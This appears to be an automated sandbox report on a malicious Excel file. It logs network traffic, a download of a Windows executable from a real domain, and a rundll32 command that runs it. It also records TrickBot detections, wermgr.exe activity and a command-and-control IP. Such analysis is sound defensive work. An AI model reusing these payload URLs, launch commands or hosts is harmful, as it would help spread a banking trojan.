                                                                                                                                                                                            Feb 20, 2021 03:17:03.700176954 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700186014 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700217009 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700242996 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700257063 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700289011 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700339079 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.709024906 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759267092 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759326935 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759366989 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759407997 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759428978 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759448051 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759471893 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759478092 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759483099 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759495974 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759507895 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759541988 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759562969 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759581089 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759603024 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759619951 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759644985 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759659052 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759701967 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759717941 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759726048 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759741068 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759761095 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759780884 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759829044 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759845972 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759857893 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759874105 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759886980 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759912014 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759951115 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759967089 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759978056 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.759989977 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.760011911 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.760027885 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.760049105 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.760067940 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.760093927 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.760128975 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.760921955 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.818933964 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819010019 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819053888 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819072962 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819093943 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819135904 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819129944 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819149017 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819176912 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819197893 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819216013 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819231987 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819240093 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819257021 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819297075 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819303036 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819346905 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819348097 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819360018 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819391012 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819403887 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819428921 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819447994 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819468975 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819485903 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819509983 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819523096 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819547892 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819565058 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819586992 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819606066 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819626093 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819644928 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819679022 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819684029 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.819722891 CET8049165185.81.0.78192.168.2.22

                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Feb 20, 2021 03:17:03.494488001 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                            Feb 20, 2021 03:17:03.552203894 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:15.065036058 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                            Feb 20, 2021 03:17:15.127029896 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:15.140758991 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                            Feb 20, 2021 03:17:15.201056957 CET53528388.8.8.8192.168.2.22

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                            Feb 20, 2021 03:17:03.494488001 CET192.168.2.228.8.8.80x62a5Standard query (0)www.chipmania.itA (IP address)IN (0x0001)

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                            Feb 20, 2021 03:17:03.552203894 CET8.8.8.8192.168.2.220x62a5No error (0)www.chipmania.itchipmania.itCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Feb 20, 2021 03:17:03.552203894 CET8.8.8.8192.168.2.220x62a5No error (0)chipmania.it185.81.0.78A (IP address)IN (0x0001)

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • www.chipmania.it

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            0192.168.2.2249165185.81.0.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Feb 20, 2021 03:17:03.634332895 CET0OUTGET /mails/open.php HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            UA-CPU: AMD64
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                            Host: www.chipmania.it
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Feb 20, 2021 03:17:03.699875116 CET2INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Sat, 20 Feb 2021 02:17:03 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Content-Disposition: attachment; filename="10.jjkes"
                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                                                                                            Keep-Alive: timeout=1, max=100
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc
                                                                                                                                                                                            Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3


                                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                            Feb 20, 2021 03:17:14.477143049 CET142.202.191.164443192.168.2.2249166CN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZCN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZThu Oct 01 03:17:34 CEST 2020Sun Sep 29 03:17:34 CEST 2030769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f

                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                            Statistics

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:03:16:30
                                                                                                                                                                                            Start date:20/02/2021
                                                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                            Imagebase:0x13f910000
                                                                                                                                                                                            File size:27641504 bytes
                                                                                                                                                                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:03:16:36
                                                                                                                                                                                            Start date:20/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                                            Imagebase:0xff7d0000
                                                                                                                                                                                            File size:45568 bytes
                                                                                                                                                                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:03:16:36
                                                                                                                                                                                            Start date:20/02/2021
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                                            Imagebase:0x3c0000
                                                                                                                                                                                            File size:44544 bytes
                                                                                                                                                                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2081720951.00000000005D8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2077502883.0000000000764000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2081503635.0000000000130000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2077497175.0000000000764000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2081774299.0000000000730000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:03:16:37
                                                                                                                                                                                            Start date:20/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                                            Imagebase:0xffe10000
                                                                                                                                                                                            File size:50688 bytes
                                                                                                                                                                                            MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:03:16:37
                                                                                                                                                                                            Start date:20/02/2021
                                                                                                                                                                                            Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                                            Imagebase:0xffe10000
                                                                                                                                                                                            File size:50688 bytes
                                                                                                                                                                                            MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                            Reset < >